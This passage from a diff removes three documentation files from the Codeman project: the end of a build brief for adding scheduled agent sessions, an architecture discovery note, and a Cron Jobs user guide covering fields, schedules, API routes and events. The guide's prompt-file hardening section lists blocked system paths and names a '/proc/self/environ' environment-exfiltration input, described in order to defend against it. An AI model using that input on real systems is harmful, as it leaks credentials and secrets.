- Create scheduled job.
|
||||
- Click Run Now.
|
||||
- Codeman session is created.
|
||||
- Prompt is sent.
|
||||
- Run history is recorded.
|
||||
- UI links to the session.
|
||||
|
||||
This is the most important milestone.
|
||||
|
||||
### Phase 5: Background Scheduler Loop
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Enabled schedules launch automatically when due.
|
||||
- Run history is recorded.
|
||||
- `last_run_at` and `next_run_at` update.
|
||||
- Duplicate launch guard exists.
|
||||
|
||||
### Phase 6: UI Polish Only After Functionality
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Scheduled jobs list is readable.
|
||||
- Create/edit form is usable.
|
||||
- Status labels are clear.
|
||||
- Errors are visible.
|
||||
|
||||
Do not polish before Phase 4 works.
|
||||
|
||||
---
|
||||
|
||||
## 14. Acceptance Criteria
|
||||
|
||||
The build is acceptable when all these pass.
|
||||
|
||||
### Manual Run
|
||||
|
||||
1. Create a schedule/job with inline prompt.
|
||||
2. Click Run Now.
|
||||
3. A new Codeman/tmux session starts.
|
||||
4. Prompt is sent into that session.
|
||||
5. The created session is visible in Codeman's normal session UI.
|
||||
6. Run history shows success or failure.
|
||||
|
||||
### One-Time Schedule
|
||||
|
||||
1. Create a one-time schedule 2 minutes in the future.
|
||||
2. Wait for it to become due.
|
||||
3. Scheduler launches a session.
|
||||
4. Prompt is sent.
|
||||
5. Schedule does not repeatedly launch forever.
|
||||
|
||||
### Interval Schedule
|
||||
|
||||
1. Create interval schedule every 2 minutes.
|
||||
2. It launches once when due.
|
||||
3. It computes the next due time.
|
||||
4. It does not launch duplicates for the same due time.
|
||||
|
||||
### Daily Schedule
|
||||
|
||||
1. Create daily schedule at a time a few minutes ahead.
|
||||
2. It launches when due.
|
||||
3. Next run becomes tomorrow at the same time.
|
||||
|
||||
### Disable Schedule
|
||||
|
||||
1. Disable a schedule.
|
||||
2. It does not launch even when due.
|
||||
|
||||
### Error Handling
|
||||
|
||||
1. Invalid working directory produces visible error.
|
||||
2. Invalid prompt file produces visible error.
|
||||
3. Failed session launch creates failed run-history entry.
|
||||
|
||||
---
|
||||
|
||||
## 15. Explicitly Out of Scope for v0.1
|
||||
|
||||
Do not implement these unless all required scope is already working:
|
||||
|
||||
- Full quota engine.
|
||||
- Advanced lock manager.
|
||||
- Post-run git inspection reports.
|
||||
- Complex recurring calendar UI.
|
||||
- User accounts / RBAC.
|
||||
- External distributed workers.
|
||||
- Redis.
|
||||
- Postgres.
|
||||
- Celery.
|
||||
- Kubernetes.
|
||||
- A separate Python service.
|
||||
- Full visual cron editor.
|
||||
- AI-generated follow-up prompts.
|
||||
- Automatic continuation after idle.
|
||||
- Any attempt to bypass agent quotas or platform limits.
|
||||
|
||||
---
|
||||
|
||||
## 16. Quality Rules
|
||||
|
||||
Follow these rules while coding:
|
||||
|
||||
1. Reuse existing Codeman services and conventions.
|
||||
2. Keep scheduler code isolated.
|
||||
3. Prefer boring, readable code over clever abstractions.
|
||||
4. Add error messages that a human can understand.
|
||||
5. Do not break existing Codeman sessions.
|
||||
6. Do not rename existing core concepts unnecessarily.
|
||||
7. Do not introduce large dependencies without strong reason.
|
||||
8. Keep v0.1 local-first and single-instance.
|
||||
9. Commit in logical chunks if git is available.
|
||||
10. After coding, provide a final implementation summary.
|
||||
|
||||
---
|
||||
|
||||
## 17. Final Response Required from Claude Code
|
||||
|
||||
At the end, report:
|
||||
|
||||
1. Files changed.
|
||||
2. New routes/pages added.
|
||||
3. New data structures added.
|
||||
4. How the scheduler loop works.
|
||||
5. How to run the app.
|
||||
6. How to test manual Run Now.
|
||||
7. How to test scheduled execution.
|
||||
8. Known limitations.
|
||||
9. Suggested v0.2 improvements.
|
||||
|
||||
---
|
||||
|
||||
## 18. v0.2 Ideas, Not for Current Build
|
||||
|
||||
Keep these in mind but do not build unless v0.1 is complete:
|
||||
|
||||
- Quota-aware scheduling.
|
||||
- Manual takeover locks.
|
||||
- Post-idle inspection.
|
||||
- Git diff reports.
|
||||
- Schedule groups.
|
||||
- Prompt templates.
|
||||
- Agent-specific concurrency rules.
|
||||
- Better timezone support.
|
||||
- Audit events.
|
||||
- More advanced cron expressions.
|
||||
|
||||
---
|
||||
|
||||
## 19. Final Reminder
|
||||
|
||||
The goal is to add **scheduling** to Codeman quickly and cleanly.
|
||||
|
||||
Do not drift into building a new platform.
|
||||
|
||||
The highest-priority path is:
|
||||
|
||||
1. Discover existing Codeman integration points.
|
||||
2. Add scheduled job persistence.
|
||||
3. Add Run Now.
|
||||
4. Add background due-job loop.
|
||||
5. Add minimal UI.
|
||||
6. Verify that scheduled jobs create real Codeman/tmux sessions and send prompts.
|
||||
|
||||
@@ -1,142 +0,0 @@
|
||||
# CRON_DISCOVERY.md
|
||||
|
||||
Phase 1 deliverable for the "Add Scheduling to Codeman" build brief.
|
||||
This documents the existing Codeman architecture and the smallest integration
|
||||
points for a cron. **No session/tmux logic will be rebuilt** —
|
||||
the new code is purely a trigger + persistence + history layer on top of the
|
||||
existing primitives.
|
||||
|
||||
Stack: `aicodeman` v1.2.1 — Fastify 5 backend, `node-pty` + tmux sessions,
|
||||
vanilla-JS SPA frontend served as static assets, JSON file state store, zod
|
||||
validation, ports-based dependency injection.
|
||||
|
||||
---
|
||||
|
||||
## 0. Critical finding: an existing `ScheduledRun` is NOT a cron
|
||||
|
||||
Codeman already has a `ScheduledRun` concept (`/api/scheduled`,
|
||||
`src/web/ports/infra-port.ts:14-26`, `src/web/server.ts:1480-1605`). It is a
|
||||
**run-now, duration-bounded autonomous loop**: given `{prompt, workingDir,
|
||||
durationMinutes}` it immediately spawns/kills throwaway sessions in a loop until
|
||||
the duration elapses. It has **no** time-based triggering, recurrence
|
||||
(once/interval/daily/weekly), enable/disable, next-run calculation, run history,
|
||||
or persistence across restarts.
|
||||
|
||||
Therefore the brief's core (the calendar/cron trigger layer) does **not** exist
|
||||
and must be built. The execution primitives it sits on top of **do** exist and
|
||||
will be reused. To honor brief §16 ("do not rename existing core concepts"), the
|
||||
new feature is named **`CronJob`** (with **`CronJobRun`** history
|
||||
records), kept distinct from the existing `ScheduledRun`.
|
||||
|
||||
---
|
||||
|
||||
## 1. Where session creation happens
|
||||
|
||||
- Canonical create flow: `POST /api/sessions`,
|
||||
`src/web/routes/session-routes.ts:262-438`.
|
||||
- `new Session({ workingDir, mode, ... })` (`src/session.ts:421-570`)
|
||||
- `ctx.addSession(session)` → `ctx.setupSessionListeners(session)` →
|
||||
`ctx.persistSessionState(session)` (all via `SessionPort`).
|
||||
- `SessionPort` interface: `src/web/ports/session-port.ts:8-16`.
|
||||
- **Integration point:** the cron service will mirror this exact sequence
|
||||
(create → addSession → setupSessionListeners → start) via `SessionPort`,
|
||||
not reimplement it.
|
||||
|
||||
## 2. Where agent/session types are defined
|
||||
|
||||
- `type SessionMode = 'claude' | 'shell' | 'opencode' | 'codex' | 'gemini'`
|
||||
(`src/types/session.ts:43-44`). `shell` covers the brief's "Terminal/custom".
|
||||
- CLI availability resolvers in `src/utils/{claude,codex,gemini,opencode}-cli-resolver.ts`.
|
||||
- **Integration point:** the job's `agentType` reuses `SessionMode` verbatim.
|
||||
|
||||
## 3. Where input is sent into a session
|
||||
|
||||
- Raw / paste: `session.write(data)` (`src/session.ts:2243-2247`) — direct PTY write.
|
||||
- Typed (recommended): `session.writeViaMux(data)` (`src/session.ts:2301-2311`)
|
||||
— tmux `send-keys`, falls back to PTY. Submit requires trailing `\r`.
|
||||
- **Integration point:** prompt delivery uses `writeViaMux` (typed) by default,
|
||||
`write` (paste) as the alternate `input_mode`.
|
||||
|
||||
## 4. Where active sessions are listed
|
||||
|
||||
- `ctx.sessions: ReadonlyMap<string, Session>` (`SessionPort`).
|
||||
- Filters: `Array.from(ctx.sessions.values()).filter(s => s.mode === X)` and
|
||||
`.isBusy()` / `.isIdle()` (`src/session-manager.ts:220-247`).
|
||||
- **Integration point:** the §8 multi-session warning queries this map.
|
||||
|
||||
## 5. Where session kill/delete is handled
|
||||
|
||||
- `ctx.cleanupSession(sessionId, killMux?, reason?)`
|
||||
(`SessionPort`; impl `src/web/server.ts:997-1152`). Underlying
|
||||
`session.stop(killMux)` at `src/session.ts:2498-2585`.
|
||||
- The cron does **not** kill sessions it launches (the brief wants them
|
||||
visible in the normal session UI); cleanup stays user-driven.
|
||||
_Superseded post-review:_ recurring jobs now default to
|
||||
`autoClosePreviousSession: true` — the previous run's still-open session is
|
||||
closed via `cleanupSession` when the next run fires (see
|
||||
`docs/cron-guide.md` §8); opt out per job for fully user-driven cleanup.
|
||||
|
||||
## 6. How session state is stored / 7. Existing persistence
|
||||
|
||||
- JSON file store: `~/.codeman/state.json` (+ `state-inner.json` for Ralph).
|
||||
`StateStore` class `src/state-store.ts:71`; `AppState` interface
|
||||
`src/types/app-state.ts:99-114`.
|
||||
- Pattern: declare a field on `AppState`, add typed get/set methods on
|
||||
`StateStore` that mutate in-memory state and call the debounced `save()`
|
||||
(500ms debounce, atomic temp-file+rename, `.bak` backup, circuit breaker).
|
||||
- **Integration point:** add `cronJobs?: Record<string, CronJob>` and
|
||||
`cronJobRuns?: Record<string, CronJobRun>` to `AppState`, with
|
||||
matching `StateStore` accessors. No new DB (brief §6 forbids Postgres/Redis).
|
||||
|
||||
## 8. Where backend routes live
|
||||
|
||||
- Route modules: `src/web/routes/*.ts`; barrel `src/web/routes/index.ts`;
|
||||
registered in `WebServer.setupRoutes()` `src/web/server.ts:858-876` with a
|
||||
single `ctx` object from `createRouteContext()` (`src/web/server.ts:553-613`)
|
||||
that satisfies all port interfaces.
|
||||
- Validation: zod schemas in `src/web/schemas.ts`, applied via
|
||||
`parseBody(Schema, req.body)` (`src/web/route-helpers.ts:101-111`).
|
||||
- Errors: `createErrorResponse(ApiErrorCode.X, msg)` / `ApiResponse`
|
||||
(`src/types/api.ts`), auto-mapped to HTTP status by a `preSerialization` hook
|
||||
(`src/web/server.ts:644-659`).
|
||||
- SSE: `ctx.broadcast(SseEvent.X, data)` (`EventPort`,
|
||||
`src/web/sse-events.ts`); frontend mirror in `src/web/public/constants.js`.
|
||||
- **Integration point:** new `cron-routes.ts` registered alongside the
|
||||
others; new zod schema; new `SseEvent` constants for job list/run changes.
|
||||
|
||||
## 9. Where frontend pages/components live
|
||||
|
||||
- Vanilla-JS SPA: single `src/web/public/index.html` + feature mixin files
|
||||
(`Object.assign(CodemanApp.prototype, {...})`). API via `api-client.js`
|
||||
(`_apiJson/_apiPost/_apiDelete`). Build = esbuild minify + content-hash, no
|
||||
bundler (`scripts/build.mjs`).
|
||||
- UI is panels/modals toggled by JS classes; forms use `.form-row` / `.modal`
|
||||
conventions (`styles.css`). SSE handler map in `app.js`.
|
||||
- **Integration point:** add a new `cron-ui.js` mixin + a panel/modal in
|
||||
`index.html` + nav entry, following the orchestrator/respawn panel pattern.
|
||||
|
||||
## 10. Background-loop pattern (for the due-checker)
|
||||
|
||||
- Established pattern: `this.cleanup.setInterval(fn, intervalMs, {description})`
|
||||
in `WebServer.start()` (`src/web/server.ts:~1942-1966`), auto-disposed in
|
||||
`WebServer.stop()` via `this.cleanup.dispose()` (`src/web/server.ts:2336`).
|
||||
RalphLoop (`src/ralph-loop.ts:268-286`) shows the self-rescheduling guard idiom.
|
||||
- **Integration point:** register a 30s cron tick via `cleanup.setInterval`;
|
||||
no manual shutdown wiring needed.
|
||||
|
||||
---
|
||||
|
||||
## Smallest integration points (summary)
|
||||
|
||||
| New piece | Reuses | Location |
|
||||
| --- | --- | --- |
|
||||
| `CronJob` / `CronJobRun` types | — (new) | `src/types/cron.ts` |
|
||||
| Persistence | `StateStore` / `AppState` | `src/types/app-state.ts`, `src/state-store.ts` |
|
||||
| Next-run time math | — (new, pure, unit-tested) | `src/cron/cron-time.ts` |
|
||||
| Launch + send prompt | `SessionPort` (`addSession`/listeners/`writeViaMux`) | `src/cron/cron-service.ts` |
|
||||
| Background due loop | `cleanup.setInterval` pattern | `src/cron/cron-loop.ts` |
|
||||
| Routes + schema | route/ports/zod/SSE patterns | `src/web/routes/cron-routes.ts`, `src/web/schemas.ts`, `src/web/sse-events.ts` |
|
||||
| UI | panel/modal/mixin conventions | `src/web/public/cron-ui.js`, `index.html` |
|
||||
|
||||
Nothing in the session, tmux, persistence, routing, or SSE subsystems is
|
||||
rewritten — the cron is additive and calls existing services.
|
||||
@@ -1,426 +0,0 @@
|
||||
# Cron Jobs — User & Operator Guide
|
||||
|
||||
Codeman's **Cron** feature lets you save named, recurring jobs that automatically
|
||||
spin up a Claude (or shell / OpenCode / Codex / Gemini) session on a schedule and
|
||||
feed it a prompt. Think "cron for agent sessions": _"every weekday at 3am, open a
|
||||
Claude session in `~/proj` and tell it to update dependencies and open a PR."_
|
||||
|
||||
- **UI**: the **⏰ Cron** button in the header → the Cron Jobs modal (`#cronModal`).
|
||||
- **API**: `/api/cron/jobs*` and `/api/cron/runs`.
|
||||
- **Code**: `src/cron/cron-service.ts`, `src/cron/cron-time.ts`, `src/cron/cron-input.ts`,
|
||||
types in `src/types/cron.ts`, routes in `src/web/routes/cron-routes.ts`,
|
||||
frontend in `src/web/public/cron-ui.js`.
|
||||
|
||||
> **Not to be confused with `ScheduledRun` (`/api/scheduled`).** That older,
|
||||
> deliberately-separate concept is a _run-now, duration-bounded autonomous loop_
|
||||
> (`{prompt, workingDir, durationMinutes}` → spawn/kill throwaway sessions until
|
||||
> the duration elapses). It has no recurrence, no saved jobs, and no next-run
|
||||
> calculation. The two systems never interact. This guide is only about **Cron
|
||||
> jobs** (`Cron*`). See `docs/cron-discovery.md` §0.
|
||||
|
||||
---
|
||||
|
||||
## 1. Quick start
|
||||
|
||||
### In the browser
|
||||
|
||||
1. Click **⏰ Cron** in the header.
|
||||
2. Click **+ New Job**.
|
||||
3. Fill in a **name**, pick an **agent type** and **working directory**, choose a
|
||||
**prompt** (inline text or a file path), pick a **schedule**, and leave
|
||||
**Enabled** on.
|
||||
4. **Save**. The job appears in the list with its computed **next run**.
|
||||
5. Use **Run Now** to fire it immediately without waiting for the schedule.
|
||||
|
||||
### With curl
|
||||
|
||||
```bash
|
||||
API=http://localhost:3000
|
||||
|
||||
# Create a daily job (03:00 server-local time)
|
||||
curl -s -X POST "$API/api/cron/jobs" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{
|
||||
"name": "nightly-deps",
|
||||
"agentType": "claude",
|
||||
"workingDir": "/home/me/proj",
|
||||
"promptMode": "inline_text",
|
||||
"promptText": "Update dependencies and open a PR",
|
||||
"inputMode": "typed",
|
||||
"scheduleType": "daily",
|
||||
"dailyTime": "03:00",
|
||||
"enabled": true,
|
||||
"concurrencyPolicy": "warn_only"
|
||||
}' | jq
|
||||
|
||||
# List jobs
|
||||
curl -s "$API/api/cron/jobs" | jq
|
||||
|
||||
# Run one immediately
|
||||
curl -s -X POST "$API/api/cron/jobs/<jobId>/run" | jq
|
||||
|
||||
# See a job's run history
|
||||
curl -s "$API/api/cron/jobs/<jobId>/runs" | jq
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Concepts
|
||||
|
||||
| Term | Meaning |
|
||||
| -------------------------- | ------------------------------------------------------------------------------------------------ |
|
||||
| **Cron job** (`CronJob`) | A saved, named definition: what agent to launch, where, with what prompt, on what schedule. |
|
||||
| **Run** (`CronJobRun`) | One execution of a job — a history record with a status and a link to the session it created. |
|
||||
| **Schedule type** | How fire times are computed: `once`, `interval`, `daily`, or `weekly`. |
|
||||
| **Next run** (`nextRunAt`) | Server-computed epoch-ms of the next fire. `null` when the job is disabled or has no future run. |
|
||||
| **Due tick** | A background loop (every 30s) that launches any enabled job whose `nextRunAt` has passed. |
|
||||
|
||||
A job is essentially a **trigger + persistence + history layer on top of the
|
||||
existing session primitives**. When a job fires, the cron service does exactly
|
||||
what the "quick start" route does — `new Session(...)` → `addSession` →
|
||||
`setupSessionListeners` → `startInteractive()`/`startShell()` → deliver the
|
||||
prompt. It does **not** reimplement any tmux/PTY logic.
|
||||
|
||||
---
|
||||
|
||||
## 3. The job form — every field
|
||||
|
||||
These map 1:1 to `CronJobSchema` (`src/web/schemas.ts`) and the `CronJob` type
|
||||
(`src/types/cron.ts`).
|
||||
|
||||
| Field | Required | Values / limits | Notes |
|
||||
| -------------------------- | ----------- | -------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
|
||||
| `name` | ✅ | 1–200 chars | Display name; also used as the created session's name. |
|
||||
| `agentType` | ✅ | `claude` \| `shell` \| `opencode` \| `codex` \| `gemini` | Reuses Codeman's `SessionMode`. `shell` = a plain terminal. |
|
||||
| `workingDir` | ✅ | valid path (allowlist-validated) | Validated at **create/update** (must exist, be a directory, and not resolve into a blocked tree — `/etc`, `/root`, `/proc`, `/sys`, `/dev`, or `/` itself) and again **at fire time**. |
|
||||
| `launchCommand` | — | ≤ 2000 chars, single line | `shell` mode only: sent as the **first input line** once the shell is up, before the prompt. Ignored for other agent types. |
|
||||
| `promptMode` | ✅ | `inline_text` \| `prompt_file_path` | See §5. |
|
||||
| `promptText` | conditional | ≤ 100000 chars, **single line** | Required when `promptMode = inline_text`. Newlines are rejected (see §6). |
|
||||
| `promptFilePath` | conditional | valid path | Required when `promptMode = prompt_file_path`. Confined to `workingDir` (see §5). |
|
||||
| `inputMode` | ✅ | `paste` \| `typed` | How the prompt is delivered. See §6. |
|
||||
| `scheduleType` | ✅ | `once` \| `interval` \| `daily` \| `weekly` | See §4. |
|
||||
| `runAt` | conditional | epoch-ms (positive int) | Required for `once`. |
|
||||
| `intervalMinutes` | conditional | 1–525600 (≤ 1 year) | Required for `interval`. |
|
||||
| `dailyTime` | conditional | `HH:MM` (24h) | Required for `daily`. Server-local time. |
|
||||
| `weeklyDays` | conditional | array of 1–7 ints, each 0–6 (0 = Sunday) | Required for `weekly`. |
|
||||
| `weeklyTime` | conditional | `HH:MM` (24h) | Required for `weekly`. Server-local time. |
|
||||
| `enabled` | ✅ | boolean | Disabled jobs never auto-fire (but **Run Now** still works). |
|
||||
| `notes` | — | ≤ 2000 chars | Free-form. |
|
||||
| `concurrencyPolicy` | ✅ | `warn_only` \| `skip_if_same_agent_running` | Applies to **automatic** runs only. See §7. |
|
||||
| `autoClosePreviousSession` | — | boolean (default **true**) | Recurring schedules only (ignored for `once`): when the next run fires, the still-open session created by this job's **previous** run is closed first via the normal cleanup path. See §8. |
|
||||
|
||||
**Cross-field validation** (`refineCronJob` in `schemas.ts`): the conditional
|
||||
fields above are enforced by a Zod `superRefine` on create. A missing dependent
|
||||
field (e.g. `scheduleType: "once"` with no `runAt`) is rejected with
|
||||
`INVALID_INPUT` and a field-specific message.
|
||||
|
||||
> ⚠️ **Update caveat.** `PUT /api/cron/jobs/:id` uses a `.partial()` schema that
|
||||
> does **not** re-run the cross-field `superRefine`. To keep partial edits safe,
|
||||
> `updateJob()` re-validates the **merged** job against the full `CronJobSchema`
|
||||
> and throws `400` if the result is inconsistent (e.g. switching to `once`
|
||||
> without a `runAt`). So the store is never left with a half-valid job.
|
||||
|
||||
---
|
||||
|
||||
## 4. Schedule types
|
||||
|
||||
Next-run math lives in `src/cron/cron-time.ts` (pure, unit-tested in
|
||||
`test/cron-time.test.ts`). **All wall-clock times use the server's local
|
||||
timezone** (v0.1 decision).
|
||||
|
||||
### `once`
|
||||
|
||||
- Fires a single time at the absolute `runAt` epoch-ms.
|
||||
- A **missed** one-time job (server was down at `runAt`) **still fires once** on
|
||||
the next tick — `computeNextRunAt` returns `runAt` even if it's in the past,
|
||||
until the job has fired.
|
||||
- After firing, the job **self-disables**: `completedOnce = true`, `enabled =
|
||||
false`, `nextRunAt = null`.
|
||||
|
||||
### `interval`
|
||||
|
||||
- Fires every `intervalMinutes`, computed as `fireTime + intervalMinutes`.
|
||||
- ⚠️ **Drift**: the next run re-anchors to the actual fire time, not to an ideal
|
||||
cadence — a slow tick or restart shifts subsequent runs slightly later. This is
|
||||
an accepted limitation.
|
||||
|
||||
### `daily`
|
||||
|
||||
- Fires at `dailyTime` (`HH:MM`) every day, server-local.
|
||||
- If today's time has already passed, the next run is tomorrow at that time.
|
||||
|
||||
### `weekly`
|
||||
|
||||
- Fires at `weeklyTime` on each weekday in `weeklyDays` (0 = Sunday … 6 =
|
||||
Saturday), server-local.
|
||||
- The next run is the soonest upcoming matching weekday/time within the next 7
|
||||
days.
|
||||
|
||||
---
|
||||
|
||||
## 5. Prompt source (`promptMode`)
|
||||
|
||||
### `inline_text`
|
||||
|
||||
The prompt is the literal `promptText`. Simplest option.
|
||||
|
||||
### `prompt_file_path`
|
||||
|
||||
The prompt is read from a file at fire time. **This path is security-hardened**
|
||||
because a job config is attacker-controllable and the file's contents are
|
||||
injected into an agent session (an exfiltration sink over SSE/terminal).
|
||||
`resolveSafePromptPath()` enforces, in order:
|
||||
|
||||
1. **`realpath` resolution** — symlinks are resolved to their true target, for
|
||||
the prompt file **and for `workingDir` itself**.
|
||||
2. **`workingDir` is not a trust boundary** — because it is user-supplied, the
|
||||
resolved `workingDir` is itself rejected if it is `/` or resolves into a
|
||||
blocked tree (`/etc`, `/root`, operator extras) or a pseudo-filesystem
|
||||
(`/proc`, `/sys`, `/dev`). This closes the `workingDir: '/proc'` +
|
||||
`promptFilePath: '/proc/self/environ'` env-exfil trick. The same rule is
|
||||
enforced earlier, at job create/update.
|
||||
3. **Blocklist** (defense-in-depth) — sensitive trees (`/etc`, `/root`,
|
||||
`/proc`, `/sys`, `/dev`, known secret locations) are rejected for the
|
||||
resolved prompt file.
|
||||
4. **Allowlist (primary gate)** — the resolved path **must live inside the job's
|
||||
(resolved) `workingDir`** (`validateSessionFilePath`). A symlink escaping the
|
||||
workspace fails here.
|
||||
5. **Regular-file check** — directories, FIFOs, and `/dev/*` character devices
|
||||
are rejected (they would hang or OOM an unbounded read).
|
||||
6. **Size cap** — files larger than **1 MiB** (`MAX_PROMPT_FILE_BYTES`) are
|
||||
rejected.
|
||||
7. **Single-line check** — after trailing newlines are stripped, the file
|
||||
content must be a single line (see §6).
|
||||
|
||||
If any check fails, the run is recorded as **`failed`** with the reason; no
|
||||
session is created.
|
||||
|
||||
---
|
||||
|
||||
## 6. Prompt delivery (`inputMode`)
|
||||
|
||||
Once the CLI is ready (see §8), the prompt is written to the session with a
|
||||
trailing carriage return:
|
||||
|
||||
| Mode | Mechanism | Use when |
|
||||
| ------- | --------------------------------------------------------------- | ------------------------------------------------ |
|
||||
| `typed` | `session.writeViaMux()` — tmux `send-keys -l` (literal) + Enter | Default; behaves like a human typing the prompt. |
|
||||
| `paste` | `session.write()` — writes directly to the PTY/mux | Bulk paste-style delivery. |
|
||||
|
||||
> ⚠️ **Single-line only — enforced.** Like all programmatic input in Codeman,
|
||||
> multi-line delivery would be silently corrupted (Ink-based TUIs treat a
|
||||
> newline as submit; typed mode fuses lines). So newlines are **rejected**: the
|
||||
> schema and the form refuse a multi-line `promptText`, and at fire time a
|
||||
> prompt file whose content is multi-line (after stripping trailing newlines)
|
||||
> fails the run with a clear `errorMessage`. Put multi-line instructions in a
|
||||
> file the agent is told to read itself (e.g. "read TASKS.md and do it").
|
||||
|
||||
---
|
||||
|
||||
## 7. Concurrency policy (automatic runs)
|
||||
|
||||
`concurrencyPolicy` governs what happens when a **scheduled** run is due and
|
||||
sessions of the same `agentType` already exist:
|
||||
|
||||
| Policy | Behavior |
|
||||
| ---------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
|
||||
| `warn_only` | Always launch. (The count is surfaced but not blocking.) |
|
||||
| `skip_if_same_agent_running` | If ≥ 1 **other, live** session of that mode is active, **skip** this fire — record a `skipped` run and (for recurring schedules) advance the schedule without launching. |
|
||||
|
||||
Notes on `skip_if_same_agent_running`:
|
||||
|
||||
- Only **live** sessions block: a tab whose CLI already exited (status
|
||||
`stopped`/`error`) does not count.
|
||||
- Sessions created by **this job's own previous runs never block it** —
|
||||
otherwise a recurring job would deadlock on the session it created last time
|
||||
and fire exactly once.
|
||||
- A skipped **`once`** job is **not consumed**: it stays armed and retries on
|
||||
the next tick until the blocking session goes away, then fires its single run.
|
||||
- A skip is **not** a run: it sets `lastStatus = 'skipped'` but does **not**
|
||||
advance `lastRunAt`.
|
||||
- Consecutive skips are **coalesced** — a perpetually-skipped interval job writes
|
||||
**one** skip record per streak, not one every tick, so it can't bloat
|
||||
`state.json`.
|
||||
|
||||
**Run Now ignores this policy on the server.** The browser shows a `confirm()`
|
||||
warning if same-type sessions are active, but if you proceed (or call the API
|
||||
directly), the job launches unconditionally.
|
||||
|
||||
---
|
||||
|
||||
## 8. What happens when a job fires
|
||||
|
||||
Sequence in `CronService.launch()`:
|
||||
|
||||
1. A `CronJobRun` is created with status **`created`** and broadcast
|
||||
(`cron:runCreated`).
|
||||
2. The prompt is resolved (inline or file, single-line enforced). Failure →
|
||||
**`failed`**.
|
||||
3. `workingDir` is checked (`statSync().isDirectory()`). Missing/not-a-dir →
|
||||
**`failed`**.
|
||||
4. **Auto-close previous session** (recurring schedules, unless
|
||||
`autoClosePreviousSession: false`): any still-open session created by this
|
||||
job's previous runs is closed via the normal session-cleanup path.
|
||||
5. The global session cap is checked (`MAX_CONCURRENT_SESSIONS = 50`). At cap →
|
||||
**`failed`**.
|
||||
6. A `Session` is created **with `useMux: true`** (so it runs inside tmux),
|
||||
registered, listeners attached, and started via `startInteractive()`
|
||||
(`startShell()` for `shell` mode). Model/claudeMode come from global config.
|
||||
Run status → **`session_started`**.
|
||||
7. **Readiness wait** (async, non-blocking): for non-shell agents the service
|
||||
polls the terminal buffer up to **60 × 500ms** for a `❯` prompt or the string
|
||||
`tokens`, then settles **2000ms** (`CRON_READY_SETTLE_MS`). Shell mode waits
|
||||
1000ms, then sends the optional `launchCommand` as the first input line
|
||||
(+1000ms settle).
|
||||
8. The prompt is delivered (`typed`/`paste`, trailing `\r`). Run status →
|
||||
**`prompt_sent`**; `finishedAt` stamped. Delivery failure (e.g. the mux
|
||||
session is gone) → **`failed`**.
|
||||
|
||||
The created session is a **normal, persistent interactive session** — it appears
|
||||
as its own tab and keeps running after the prompt is sent. The run's
|
||||
`createdSessionUrl` is a deep link (`/?session=<id>`); the UI focuses it
|
||||
automatically after **Run Now**.
|
||||
|
||||
> ⚠️ **Session-cap math if you disable auto-close.** With
|
||||
> `autoClosePreviousSession: false`, nothing ever closes the sessions a
|
||||
> recurring job creates — an interval job every 30 min creates 48 tabs/day and
|
||||
> hits the global 50-session cap in ~25 hours (sooner with existing tabs), after
|
||||
> which **every** fire of **every** job fails with "Maximum concurrent sessions
|
||||
> reached" until you delete tabs by hand. Leave auto-close on for unattended
|
||||
> recurring jobs, or clean up sessions yourself.
|
||||
|
||||
### The background tick
|
||||
|
||||
`tickDueJobs()` runs every **30s** (`CRON_TICK_INTERVAL`, registered in
|
||||
`server.ts`). For each enabled job whose `nextRunAt ≤ now`:
|
||||
|
||||
- **Duplicate-launch guard**: `lastDueKey = jobId:fireTime`. If this due time was
|
||||
already consumed (overlap/restart), the job is just advanced, not relaunched.
|
||||
- The schedule is **advanced _before_ launching** so a slow launch can't be
|
||||
re-triggered by the next tick.
|
||||
- On boot, `init()` recomputes `nextRunAt` for loaded jobs (dead `once` jobs stay
|
||||
dead).
|
||||
|
||||
---
|
||||
|
||||
## 9. Run history & statuses
|
||||
|
||||
Each job keeps a history of `CronJobRun` records. Statuses (`CronJobRunStatus`):
|
||||
|
||||
| Status | Meaning |
|
||||
| ----------------- | ------------------------------------------------------------- |
|
||||
| `created` | Run record created; prompt/session not yet started. |
|
||||
| `session_started` | Session launched successfully. |
|
||||
| `prompt_sent` | Prompt delivered — the happy-path terminal state. |
|
||||
| `failed` | Something went wrong (see `errorMessage`). |
|
||||
| `skipped` | A scheduled fire was skipped by `skip_if_same_agent_running`. |
|
||||
|
||||
Each run also records `triggerType` (`scheduled` or `manual_run_now`),
|
||||
`sessionId`/`sessionName`, timestamps, and `createdSessionUrl`.
|
||||
|
||||
**History is capped globally** at **500 records** (`MAX_CRON_RUN_HISTORY`); the
|
||||
oldest are pruned first. Deleting a job also deletes its run records.
|
||||
|
||||
---
|
||||
|
||||
## 10. API reference
|
||||
|
||||
All responses use the standard `ApiResponse<T>` envelope (`{success, data}` /
|
||||
`{success, error, errorCode}`). `/api/v1/*` is a stable alias.
|
||||
|
||||
| Method | Endpoint | Body | Returns |
|
||||
| -------- | ---------------------------- | ---------------------- | --------------------------------- |
|
||||
| `GET` | `/api/cron/jobs` | — | `CronJob[]` |
|
||||
| `POST` | `/api/cron/jobs` | `CronJobSchema` | `{ job }` |
|
||||
| `GET` | `/api/cron/jobs/:id` | — | `CronJob` (404 if missing) |
|
||||
| `PUT` | `/api/cron/jobs/:id` | partial `CronJob` | `{ job }` (400 if merge invalid) |
|
||||
| `DELETE` | `/api/cron/jobs/:id` | — | `{}` |
|
||||
| `PUT` | `/api/cron/jobs/:id/enabled` | `{ enabled: boolean }` | `{ job }` |
|
||||
| `POST` | `/api/cron/jobs/:id/run` | — | `{ run, activeAgents }` |
|
||||
| `GET` | `/api/cron/jobs/:id/runs` | — | `CronJobRun[]` (newest first) |
|
||||
| `GET` | `/api/cron/runs` | — | all `CronJobRun[]` (newest first) |
|
||||
|
||||
---
|
||||
|
||||
## 11. SSE events
|
||||
|
||||
Emitted on `/api/events`, mirrored in `SSE_EVENTS` (`constants.js`):
|
||||
|
||||
| Event | Payload | When |
|
||||
| ------------------ | ------------ | -------------------------------------------------------------------- |
|
||||
| `cron:jobsChanged` | `{ jobs }` | Any job created / updated / enabled / status change. |
|
||||
| `cron:jobDeleted` | `{ id }` | A job was deleted. |
|
||||
| `cron:runCreated` | `CronJobRun` | A run (incl. skips) started. |
|
||||
